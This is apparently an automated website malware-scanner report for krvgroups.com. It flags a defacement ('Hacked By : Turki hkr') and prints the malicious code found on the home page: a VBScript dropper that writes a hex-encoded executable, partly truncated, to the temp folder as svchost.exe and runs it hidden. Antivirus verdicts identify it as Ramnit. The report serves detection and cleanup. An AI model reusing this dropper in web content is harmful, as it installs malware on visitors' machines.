Malware Scanner report for krvgroups.com

Malicious/Suspicious/Total URLs checked: 1/0/2 (1 page has malicious code. See details below)
Blacklists: OK
Malicious Redirects: OK
Malicious/Hidden/Total iFrames: 0/0/0
Deface / Content modification: Found
Probably the website is defaced. The following signature was found:

Hacked By :   (232 websites defaced)

See details below

Scanned pages/files

Request: http://krvgroups.com/
Server response: 200 OK
Content-Length: 238258
Content-Type: text/html
Status: suspicious
Malicious code - confirmed by antiviruses (see below)

<!--
DropFileName = 'svchost.exe'
WriteData = '4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000D80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000525B767E163A182D163A182D163A182DD535452D1B3A182D163A192D2E3A182D31FC6A2D173A182D31FC642D173A182D31FC602D173A182D52696368163A182D00000000000000000000000000000000000000000000000050450000
... 3071 bytes are skipped ...
0F4903320F4903320F4903320F4903320F4903320F4903320'
Set FSO = CreateObject('Scripting.FileSystemObject')
DropPath = FSO.GetSpecialFolder(2) & '' & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng('&H' & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject('WScript.Shell')
WSHshell.Run DropPath, 0

Antivirus reports:

AntiVir: HTML/Ramnit.EB
Bkav: MW.Clodf1d.Trojan.5285
Panda: W32/Cosmu.A
nProtect: Trojan.HTML.Ramnit.C
TrendMicro-HouseCall: TROJ_GEN.F47V1115
Emsisoft: Trojan.HTML.Ramnit.C (B)
MicroWorld-eScan: Trojan.HTML.Ramnit.C
F-Secure: Trojan.HTML.Ramnit.C
AVG: VBS/Heur
GData: Trojan.HTML.Ramnit.C
BitDefender: Trojan.HTML.Ramnit.C

Deface/Content modification. The following signature was found: Hacked By :

...[964 bytes skipped]...
cription' content='&#1578;&#1605; &#1575;&#1604;&#1575;&#1582;&#1578;&#1585;&#1575;&#1602; &#1605;&#1606; &#1602;&#1576;&#1604; &#1578;&#1585;&#1603;&#1610; &#1548; &#1607;&#1603;&#1585;'>
</head>

<body bgcolor='#000000'>

<p align='center'><b><font size='4' color='#92815C'>Hacked By : </font>
<font color='#FFFFFF'><font size='4'>Turki hkr</font></font></b></p>
<p align='center'>&nbsp;</p>
<p align='center'>
<img border='0' src='http://im40.gulfup.com/MCgE8.jpg' width='333' height='333'></p>
<p align='center' style='color: rgb(0, 0, 0); font-family: Times New Roman; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-s
...[240614 bytes skipped]...


Request: http://krvgroups.com/test404page.js
Server response: 404 Not Found
Content-Length: 331
Content-Type: text/html
Status: clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: krvgroups.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Aug 2014 21:08:20 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4
Content-Type: text/html
X-Powered-By: PHP/5.4.28

Second query (visit from search engine):
GET / HTTP/1.1
Host: krvgroups.com
Referer: http://www.google.com/search?q=krvgroups.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=krvgroups.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://krvgroups.com/

Result: krvgroups.com is not infected or malware details are not published yet.